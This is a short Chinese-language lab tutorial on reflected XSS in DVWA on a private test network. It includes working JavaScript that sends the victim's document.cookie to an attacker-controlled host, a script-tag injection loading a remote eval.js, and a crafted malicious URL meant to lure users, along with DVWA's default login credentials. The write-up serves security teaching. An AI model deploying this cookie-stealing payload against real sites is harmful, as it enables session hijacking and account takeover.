赞
踩
实验环境:
DVWA:Windows 7,存在XSS漏洞的网站;|IP: 192.168.124.6
|
主机A:Cent OS,攻击者;|IP:192.168.124.7
|
主机B:Windows 7,被攻击者;|IP: 192.168.124.2
|
配置DVWA:
config.inc.php.bak
|,将数据库密码改为|$_DVWA[ 'db_password' ] = 'root';
|;保存后将配置文件名改为|config.inc.php
|http://192.168.124.6/DVWA
|,会自动弹出登陆界面。 |Username / Password:admin / password
|var img = document.createElement("img");
img.src = "http://192.168.124.7/log?"+escape(document.cookie);
document.body.appendChild(img);
<script src=http://192.168.124.7/eval.js></script>
|并提交。此时主机A的恶意脚本被执行,主机B的Cookie被以GET方式发送给主机A。在主机A上用|tail /var/log/httpd/access_log
|查看web日志,发现已经获取到Cookie:在真实攻击过程中,攻击者可以构造恶意url|http://192.168.124.6/DVWA/vulnerabilities/xss_r/?name=%3Cscript+src%3Dhttp%3A%2F%2F192.168.124.7%3A6789%2FDesktop%2Feval.js%3E%3C%2Fscript%3E#
|,诱使用户点击该链接,那么用户的Cookie就会发送到攻击者的主机上,攻击者利用该Cookie就能够登陆受害者的账户了。
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。